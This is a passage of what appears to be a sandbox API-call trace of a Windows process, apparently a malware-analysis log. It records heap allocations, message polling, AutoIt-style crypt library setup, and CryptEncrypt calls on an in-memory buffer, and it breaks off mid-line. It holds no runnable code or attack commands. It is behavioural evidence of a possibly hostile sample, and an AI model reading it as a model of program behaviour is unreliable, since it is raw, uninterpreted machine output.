RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0258.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0258.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0258.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0258.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0259.000] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0259.000] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0259.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0259.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0259.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.000] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0259.022] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.022] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0259.022] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0259.022] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0259.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0259.022] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.023] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.023] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0259.023] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0259.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0259.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0259.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0259.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0259.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.024] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0259.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0259.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0259.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51640 [0259.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.025] CryptEncrypt (in: hKey=0xa87710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2bd9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2be0) returned 1 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0259.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0259.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0259.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.027] CharLowerBuffW (in: lpsz="byte[11232]", cchLength=0xb | out: lpsz="byte[11232]") returned 0xb [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0259.027] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0259.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0259.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0259.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.029] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0259.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0259.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0259.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0259.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0259.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0259.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0259.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0259.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51688, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0259.030] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0259.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0259.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.031] CryptEncrypt (in: hKey=0xa87710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f16bf8*, pdwDataLen=0x8cef60*=0x2bd9, dwBufLen=0x2be0 | out: pbData=0x2f16bf8*, pdwDataLen=0x8cef60*=0x2be0) returned 1 [0259.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.031] RtlAllocateHeap (HeapHandle=0x970000, 